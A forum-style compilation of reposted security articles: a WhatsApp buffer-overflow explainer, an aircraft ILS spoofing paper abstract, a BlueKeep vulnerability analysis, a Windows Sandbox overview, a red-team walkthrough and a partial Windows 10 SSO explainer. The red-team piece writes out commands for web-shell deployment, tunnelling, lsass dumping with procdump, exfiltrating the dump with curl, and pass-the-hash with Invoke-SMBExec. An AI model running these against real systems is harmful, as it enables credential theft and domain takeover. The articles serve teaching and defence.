    WhatsApp’s reputation as a secure messaging app and its popularity amongst activists made the report of a 3rd party company stealthily offering turn-key targeted surveillance against WhatsApp’s Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli company the NSO Group, is likely an offshoot of Unit 8200 that was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program, and has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and allegedly aiding the Saudi regime spy on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO. The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case.

    So what went wrong?

    Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that the chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting communications of their target if they could instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages.

    According to a brief security advisory issued by Facebook, the attack against WhatsApp was a previously unknown (0-day) vulnerability in the mobile app. A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what’s called a buffer overflow memory corruption vulnerability due to insufficient checking of length of data.

    I’ve heard the term buffer overflow. But I don’t really know what it is.

    To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let’s imagine this memory as a vast row of labeled boxes, sequentially from 0.

    storage.jpg

    (Photo by Samuel Zeller on Unsplash)

    Suppose some program, through dynamic memory allocation, opts to store the name of the current user (“mom”) as the three characters “m”, “o” and “m” in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards.

    memory.png

    A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of “mom” inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in “mommy”. The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there.

    memory2.png

    But how does this relate to security?

    Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004 with the control flow of the program always impacted, then it’s highly likely that the programmer has already discovered their mistake when testing the program -- the program is bound to fail each time, afterall. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have failed the sniff test and persisted in the code base.

    Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for the program to figure out how the program should continue to run. The formal word is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function). Suddenly, the path of the program execution can be influenced by the user. It’s like you could tell somebody else’s program, “Hey, you should do X, Y and Z”, and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do?

    I would … tell the program to .. take over the computer?

    You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running. This choice of a payload is the craft of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?)

    Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code. Both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string “mommy”, that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers, first hypothetically in 1972 and then practically by MIT’s Robert T. Morris’s Morris worm that swept the internet in 1988 and Aleph One’s 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack.

    The second idea, which was crystalized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions that are already contained within the program in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers without the author needing to provide any handwriting.

    code-reuse.jpg

    (Image generated with Ransomizer.com)

    Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state-of-the-art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018.

    graph.png

    Ahh… but what happened with WhatsApp?

    What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code in the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information of how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transmission Protocol).

    checkpoint.png

    (Image credit: CheckPoint Research)

    The odd choices for variable names and structure are artifacts from the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response to signal a picture loss (PLI) (code is illustrative):

    int length_argument = /* from incoming RTCP packet */
    qmemcpy( &outgoing_rtcp_payload[ offset ], incoming_rtcp_packet, length_argument );
    /* Continue building RTCP PLI packet and send */
    

    But if the remaining size of the payload buffer (after offset) is less than the length_argument, a number supplied by the hacker, information from the incoming packet would be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload ! Just like the situation with the buffer overflow before, these overwritten data could include data that could later direct the control flow of the program, like an overwritten function pointer.

    In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user. As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frame so that the lengths in the incoming packet will cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running.

    Try it yourself?

    Buffer overflows are technical flaws, and build on an understanding of how computers execute code. Given how prevalent they are, and important -- as illustrated by the WhatsApp attack, we believe we should all better understand how such bugs are exploited to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence.

    Do you like this kind of thing? 
    Go read about how Facebook got hacked last year and try out hacking it yourself.

    Learn more about our security training platform for developers at adversary.io

     

    Sursa: https://blog.adversary.io/whatsapp-hack/

    • Upvote 1
  7. Wireless Attacks on Aircraft Instrument Landing Systems

    Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir Khoury College of Computer Sciences Northeastern University, Boston, MA, USA

     

    Abstract Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers demonstrated vulnerabilities in many aviation systems. However, the resilience of the aircraft landing systems to adversarial wireless attacks have not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commerciallyavailable SDR, causing last-minute go around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine-grain control the course deviation indicator as displayed by the ILS receiver, in realtime. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary’s transmitted signals as a function of the aircraft GPS location, maintaining power and deviation consistent with the adversary’s target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA certified flight-simulator (X-Plane)’s AI-based autoland feature, and demonstrate systematic success rate with offset touchdowns of 18 meters to over 50 meters.

     

    Download: https://aanjhan.com/assets/ils_usenix2019.pdf

  8. Analysis of CVE-2019-0708 (BlueKeep)

     

    I held back this write-up until a proof of concept (PoC) was publicly available, as not to cause any harm. Now that there are multiple denial-of-service PoC on github, I’m posting my analysis.

    Binary Diffing

    As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results.

    BinDiff.png A BinDiff of TermDD.sys pre and post patch.

    Most of the changes turned out to be pretty mundane, except for “_IcaBindVirtualChannels” and “_IcaRebindVirtualChannels”. Both functions contained the same change, so I focused on the former as bind would likely occur before rebinding.

    IcaBindVirtualChannels.png Original IcaBindVirtualChannels is on the left, the patched version is on the right.

    New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to “MS_T120”, then parameter three of _IcaBindChannel is set to the 31.

    Based on the fact the change only takes place if v4+88 is “MS_T120”, we can assume that to trigger the bug this condition must be true. So, my first question is: what is “v4+88”?.

    Looking at the logic inside IcaFindChannelByName, i quickly found my answer.

    IcaFindChannelByName.png Inside of IcaFindChannelByName

    Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel, by its name.

    The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure.

    Using all of the above, I came to the conclusion that “MS_T120” is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120.

    I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspecting the channel name and call stack.

    Callstack1.png The callstack and channel name upon the first call to IcaBindVirtualChannels

    The very first call to IcaBindVirtualChannels is for the channel i want, MS_T120. The subsequent channel names are “CTXTW   “, “rdpdr”, “rdpsnd”, and “drdynvc”.

    Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, i’d need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name.

    So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. Just need to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight.

    WiresharkCapture.png A capture of the RDP connection sequence ChannelArray.png The channel array, as seen by WireShark RDP parser

    The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need.

    Seeing as MS_T120 and CTXTW are not specified anywhere, but opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels.

    After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test.

    VulnerableCodePath.png Breakpoint is hit after adding MS_T120 to the channel array

    Awesome! Now the vulnerable code path is hit, I just need to figure out what can be done…

    To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection.

    IcaCreateChannelCallstack.png The call stack when the IcaCreateChannel breakpoint is hit

    Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that’s not of interest.

    Below is the ICAAPI, which is the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel.

    Due to the fact IcaOpenChannel is a generic function used for opening all channels, we’ll go down another level to rdpwsx!MCSCreateDomain.

    MCSCreateDomain.png The code for rdpwsx!MCSCreateDomain

    This function is really promising for a couple of reasons: Firstly, it calls IcaChannelOpen with the hard coded name “MS_T120”. Secondly, it creates an IoCompletionPort with the returned channel handle (Completion Ports are used for asynchronous I/O).

    The variable named “CompletionPort” is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port.

    XrefsToCompletionPort.png All references to “CompletionPort”

    Well, MCSInitialize is probably a good place to start. Initialization code is always a good place to start.

    MCSInitialize.png The code contained within MCSInitialize

    Ok, so a thread is created for the completion port, and the entrypoint is IoThreadFunc. Let’s look there.

    IoThreadFunc.png The completion port message handler

    GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it’s passed to MCSPortData.

    To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string “MalwareTech” to the channel.

    MCSPortDataBreakpoint.png Breakpoint hit on MCSPortData once data is sent the the channel.

    So that confirms it, I can read/write to the MS_T120 channel.

    Now, let’s look at what MCSPortData does with the channel data…

    MCSPortData.png MCSPortData buffer handling code

    ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function is a check performed on chanel_ptr+120 (offset 4 into the data buffer). If the dword is set to 2, then the function calls HandleDisconnectProviderIndication and MCSCloseChannel.

    Well, that’s interesting. The code looks like some kind of handler to deal with channel connects/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally.

    I don’t think we’re supposed to be here…

    Being a little curious, i sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn’t lead to any issues, could it?

    BSOD.png Oh, no. We crashed the kernel!

    Whoops! Let’s take a look at the bugcheck to get a better idea of what happened.

    Bugcheck.png

    It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I’d already closed (leading to a double free).

    Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better.

    ChannelId.png Internals of the channel cleanup code run when the connection is broken

    Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another id.

    PatchAnnotated.png The difference in code pre and post patch

    Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Due to the fact the channel is bound under two different ids, we get two separate references to it.

    When one reference is used to close the channel, the reference is deleted, as is the channel; however, the other reference remains (known as a use-after-free). With the remaining reference, it is now possible to write kernel memory which no longer belongs to us.

     

    Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html

    • Like 1
    • Upvote 1
  9. Hari Pulapaka
     
    Microsoft
    ‎12-18-2018 04:18 PM
     
     

    Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

     

    How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine?

     

    At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted.

     

    Windows Sandbox has the following properties:

    • Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
    • Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows
    • Disposable – nothing persists on the device; everything is discarded after you close the application
    • Secure – uses hardware-based virtualization for kernel isolation, which relies on the Microsoft’s hypervisor to run a separate kernel which isolates Windows Sandbox from the host
    • Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU

     

    Prerequisites for using the feature

    • Windows 10 Pro or Enterprise Insider build 18305 or later
    • AMD64 architecture
    • Virtualization capabilities enabled in BIOS
    • At least 4GB of RAM (8GB recommended)
    • At least 1 GB of free disk space (SSD recommended)
    • At least 2 CPU cores (4 cores with hyperthreading recommended)

     

    Quick start

    1. Install Windows 10 Pro or Enterprise, Insider build 18305 or newer
    2. Enable virtualization:
      • If you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS.
      • If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet:
      • Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true
    3. Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer.
    4. Optional Windows Features dlg.png
    5. Using the Start menu, find Windows Sandbox, run it and allow the elevation
    6. Copy an executable file from the host
    7. Paste the executable file in the window of Windows Sandbox (on the Windows desktop)
    8. Run the executable in the Windows Sandbox; if it is an installer go ahead and install it
    9. Run the application and use it as you normally do
    10. When you’re done experimenting, you can simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted
    11. Confirm that the host does not have any of the modifications that you made in Windows Sandbox.

     Windows Sandbox Screenshot - open.jpg

     

    Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values.

     

    Windows Sandbox internals

    Since this is the Windows Kernel Internals blog, let’s go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud. We took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server.

     

    Some of the key enhancements we have made include:

     

    Dynamically generated Image

    At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine.

     

    We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as “dynamic base image”: an operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host. The majority of the files are links (immutable files) and that's why the small size (~100MB) for a full operating system. We call this instance the “base image” for Windows Sandbox, using Windows Container parlance.

     

    When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB. When installed the dynamic base package it occupies about 100MB disk space.

     Dynamic Image.PNG

    Smart memory management

    Memory management is another area where we have integrated with the Windows Kernel. Microsoft’s hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to running devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the Sandbox if needed.

     

    Additionally, since Windows Sandbox is basically running the same operating system image as the host we also allow Windows sandbox to use the same physical memory pages as the host for operating system binaries via a technology we refer to as “direct map”. In other words, the same executable pages of ntdll, are mapped into the sandbox as that on the host. We take care to ensure this done in a secure manner and no secrets are shared. 

     Direct Map.PNG

    Integrated kernel scheduler

    With ordinary virtual machines, Microsoft’s hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called “integrated scheduler” which allows the host to decide when the sandbox runs. 

     

    For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of using the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine which results in a much more responsive host, similar to Linux KVM.

     

    The whole goal here is to treat the Sandbox like an app but with the security guarantees of a Virtual Machine. 

     

    Snapshot and clone

    As stated above, Windows Sandbox uses Microsoft’s hypervisor. We're essentially running another copy of Windows which needs to be booted and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies; “snapshot” and “clone.”

     

    Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk. Then we can restore the sandbox environment from disk and put it in the memory rather than booting it, when we need a new instance of Windows Sandbox. This significantly improves the start time of Windows Sandbox. 

     

    Graphics virtualization

    Hardware accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments; e.g. Microsoft RemoteFX.

     

    More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows.

     

    At a high level, this form of graphics virtualization works as follows:

    • Apps running in a Hyper-V VM use graphics APIs as normal.
    • Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads.
    • The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients.

    This process is illustrated below:

     

    GPU virtualization for Sandbox - diagram.png 

     

    This enables the Windows Sandbox VM to benefit from hardware accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases.

     

    To take advantage of these benefits, you’ll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft’s CPU-based rendering technology.

     

    Battery pass-through

    Windows Sandbox is also aware of the host’s battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user.

     

    Filing bugs and suggestions

    As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. 

     

    File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follows these steps:

    1. Open the Feedback Hub
    2. Select Report a problem or Suggest a feature.
    3. Fill in the Summarize your feedback and Explain in more details boxes with a detailed description of the issue or suggestion.
    4. Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback. It is located under "Security and Privacy" subcategory "Windows Sandbox".
    5. Feedback Hub.png
    6. Select Next 
    7. If necessary, you can collect traces for the issue as follows: Select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture.
    8. Attach any relevant screenshots or files for the problem.
    9. Submit. 

    Conclusion

    We look forward to you using this feature and receiving your feedback!

     

    Cheers, 

    Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay

    (Windows Sandbox team)

     

    Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849

  10. Exploiting UN-attended Web Servers To Get Domain Admin – Red Teaming

    Note: Images used are all recreated to redact actual target information.

    Recently, we conducted a remote red team assessment on a large organization and its child companies. This organization was particularly concerned about the security posture of their assets online. This was an organization with multiple child companies working with them, third-party organizations working on-premise as well as remotely to develop new products. The objective was to compromise the domain from their online assets.

    While we want to this blog to be more on the technical side on how we compromised their network, we also want to point out a few mistakes that large organizations usually make.

    TIP: It is easy to lose your way during reconnaissance when there is a huge scope and little time is involved. To avoid getting lost keep a track of everything you performed, found & is vulnerable in a place.

    In reconnaissance, we identified few apache tomcat servers (mostly v7.0.70) running on the target organization’s owned range of IP addresses that seemed interesting. We sprayed few common credentials on these web servers and successfully logged in one of the servers. Later, we came to know that this server was being used by one of the child organizations for debugging applications to remote developers.  Upon logging in, we came to know that tomcat was running on a windows server 2012 r2.

    Now, the easiest way to get command execution would be to upload a JSP web shell on the host server. we used a simple JSP web shell from security risk advisors cmd.jsp to execute commands on the host server.

    Since tomcat allows deploying web apps in “war” format, we generated a .war file with `jar -cvf example.war cmd.jsp` to blend in with default web apps. After uploading the web shell, we immediately copied existing web shell to examples/jsp/images/somerandomname.jsp to avoid detection and obvious directory brute forcing. We then removed the previously uploaded web shell by un-deploying it.

    Now that we had command execution and file upload capabilities on the host server, we began enumerating the host server for more information such as user name, current user privileges, current logged in users, host patch level, anti-malware services running on host, host uptime, firewall rules, proxy settings, domain admins etc. Next objective was to gather as much information as possible of the target machine, below is the gathered information:
    Windows 2012 r2 Virtual machine inside the target domain.

    • Newly launched
    • Tomcat Service running with domain user privileges who is also a member of BUILTIN\Administrators group
    • Latest security patches
    • RDP enabled
    • Daily User activity
    • No SSH
    • Armed with System Centre Endpoint protection and Trend Micro Deep Security.
    • SYSVOL search for credentials didn’t yield satisfactory results.

    While we had administrative privileges on the host, the web shell interactivity was very limited. The immediate goal was to gain a better foothold on the target host by following either of the methods below:

    1. Drop an agent on the disk which slips past a multi-layered firewall, DPI and SOC team monitoring and connects us back with a shell.
    2. or use web application server to tunnel traffic to target host over https and reach the internal host’s services like RDP, SMB and other web applications running on the target host.  (start a bind shell on the localhost of target host by dropping “nc.exe”, connect to it and get a shell)

    As 1337 as it sounds, 1 is not always a go-to option, especially when there are heavy egress restrictions and obstacles and you have relatively limited time to complete an assessment. Tunnelling, on the other hand, is much quicker. while there is a caveat of additional work on getting a shell, the advantages like service interaction overshadow this caveat by a large margin. To achieve tunnelling, we used “A Black Path Toward the Sun“(ABPTTS) by Ben Lincoln from NCC group. You can find it here. Ben has done a great job describing the tool and how you can use it on situations like these. we recommend reading the manual before proceeding further.

    Following is a typical way of tunnelling via ABPTTS.

    1. Generate a server-side JSP file with default configuration with:

    python abttsfactory.py –o tomcat_walkthrough

    2. Generated war format of the JSP file.

    jar -cvf tunnel.jsp abptts.jsp

    3. Upload war file.

    4. On the attack host, set the ABPTTS client forward all the attack host’s localhost traffic on port 3389 to target host port 3389.

    python abpttsclient.py –c tomcat_walkthrough/config.txt –u <url-of-uploaded-jsp-server-file> -f 127.0.0.1:3389/127.0.0.1:3389

    5. On the attack host run:

    rdesktop 127.0.0.1

    Similar to the above scenario we obtained internal service interaction with the target host.

    1.png

    Since we had local administrator privileges, from the web shell we added a new local user on the machine and added the new user to administrators and remote desktop users group. Everything was obvious from here. Now we could log in as a high privileged local user using RDP via tunnelling. While we didn’t have access to the domain yet, this is a huge win already.

    2.png

    Next thing is we used resources at hand to gain access to the domain. A typical procedure for this find credentials in the network or the local system. while SYSVOL search was a let-down, we can still extract credentials from the target host (the one compromised earlier). For this, we used Sysinternals’ “ProcDump.exe” to extract the memory contents of lsass.exe and feed it to mimikatz. We uploaded the procdump on the target host and moved it to the newly created user’s desktop. The procdump requires administrator privileges to run. So we opened cmd as an administrator and ran procdump with:

    procdump.exe -accepteula -ma lsass.exe lsass.dmp

    Now, comes the tricky part of exfiltrating the dmp file which was well over 50mb. we used fuzzdb’s list.jsp in combination with curl to exfiltrate the file from the web server. List.jsp is a directory and file viewer from fuzzdb. You can find it here. We generated a war and deployed it on the tomcat server. Navigated to where the lsassdump was and copied the URL. Now on the attacking host, using curl, we ran:

    curl –insecure https://targethost/examples/images/jsp/list.jsp?file=c:/Users/Administrator/Contacts/lsass.dmp –output lsass.dmp

    We then fed the lsass dump file to our windows instance running mimikatz. We found over 6-7 domain user NTLM hashes and one Domain admin NTLM hash who recently logged in.

    Checkmate. No unexpected twists, no drama.

    3.png

    We then used Invoke-SMBExec from here to get a shell and pass the hash by running:

    Import-Module Invoke-SMBExec.ps1

    Invoke-SMBExec -Target dc.domain.com -Domain domain.com -Username grantmepower -Hash <ntlm hash>

    When we updated the target organization about this, they asked us to end it here.

    To conclude this post, we would like to advise organizations with a large footprint on the internet that, expensive network security devices, Anti-malware software and 24/7 monitoring aren’t enough to protect internal networks. Especially, when you leave domain member servers wide open to internet with weak credentials and expect adversaries to knock on your front door. That said these are takeaways for the organization:

    • Keep track of servers especially domain servers which are being used to develop products.
    • Do not deploy servers without checking for weak credentials.
    • There was no reason for the domain user to be a local administrator on that server.
    • There is no need for a user belonging domain admin group to login into any domain machine to perform daily administrative tasks.
    • Always Delegate control and follow the least privilege model.
    • Frequent password rotation of high privileged user helps.

    Credits –
    Mukunda – https://twitter.com/_m3rcii

    Manideep – https://twitter.com/mani0x00

     

    Mukunda Krishna

    I am still working on my short bio. Until then you can browse my 1 posts and provide a feedback.

    More posts by Mukunda Krishna

     

    Sursa: https://wesecureapp.com/2019/05/31/exploiting-un-attended-web-servers-to-get-domain-admin-red-teaming/

  11. How SSO works in Windows 10 devices

    Posted on November 8, 2016by Jairo

    In a previous post I talked about the three ways to setup Windows 10 devices for work with Azure AD. I later covered in detail how Azure AD Join and auto-registration to Azure AD of Windows 10 domain joined devices work, and in an extra post I explained how Windows Hello for Business (a.k.a. Microsoft Passport for Work) works. In this post I will cover how Single Sign-On (SSO) works once devices are registered with Azure AD for domain joined, Azure AD joined or personal registered devices via Add Work or School Account.

    SSO in Windows 10 works for the following types of applications:

    1. Azure AD connected applications, including Office 365, SaaS apps, applications published through the Azure AD application proxy and LOB custom applications integrating with Azure AD.
    2. Windows Integrated authentication apps and services.
    3. AD FS applications when using AD FS in Windows Server 2016.

     

    The Primary Refresh Token

    SSO relies on special tokens obtained for each of the types of applications above. These are in turn used to obtain access tokens to specific applications. In the traditional Windows Integrated authentication case using Kerberos, this token is a Kerberos TGT (ticket-granting ticket). For Azure AD and AD FS applications we call this a Primary Refresh Token (PRT). This is a JSON Web Token containing claims about both the user and the device.

    The PRT is initially obtained during Windows Logon (user sign-in/unlock) in a similar way the Kerberos TGT is obtained. This is true for both Azure AD joined and domain joined devices. In personal devices registered with Azure AD, the PRT is initially obtained upon Add Work or School Account (in a personal device the account to unlock the device is not the work account but a consumer account e.g. hotmail.com, live.com, outlook.com, etc.).

    The PRT is needed for SSO. Without it, the user will be prompted for credentials when accessing applications every time. Please also note that the PRT contains information about the device. This means that if you have any device-based conditional access policy set on an application, without the PRT, access will be denied.

     

    PRT validity

    The PRT has a validity of 90 days with a 14 day sliding window. If the PRT is constantly used for obtaining tokens to access applications it will be valid for the full 90 days. After 90 days it expires and a new PRT needs to be obtained. If the PRT has not been used in a period of 14 days, the PRT expires and a new one needs to be obtained. Conditions that force expiration of the PRT outside of these conditions include events like user’s password change/reset.

    For domain joined and Azure AD joined devices, renewal of the PRT is attempted every 4 hours. This means that the first sign-in/unlock, 4 hours after the PRT was obtained, a new PRT is attempted to be obtained.

    Now, there is a caveat for domain joined devices. Attempting to get a new PRT only happens if the device has a line of sight to a DC (for a Kerberos full network logon which triggers also the Azure AD logon). This is a behavior we want to change and hope to make for the next update of Windows. This would mean that even if the user goes off the corporate network, the PRT can be updated. The implication of this behavior today, is that a domain joined device needs to come into the corporate network (either physically or via VPN) at least once every 14 days.

     

    Domain joined/Azure AD joined devices and SSO

     

    The following step-by-step shows how the PRT is obtained and how it is used for SSO. The diagram shows the flow in parallel to the long standing Windows Integrated authentication flow for reference and comparison.

    sso-in-windows-10

     

    (1) User enter credentials in the Window Logon UI

    In the Windows Logon UI the user enters credentials to sign-in/unlock the device. The credentials are obtained by a Credential Provider. If using username and password the Credential Provider for username and password is used, if using Windows Hello for Business (PIN or bio-gesture), the Credential Provider for PIN, fingerprint or face recognition is used.

    credprov

     

    (2) Credentials are passed to the Cloud AP Azure AD plug-in for authentication

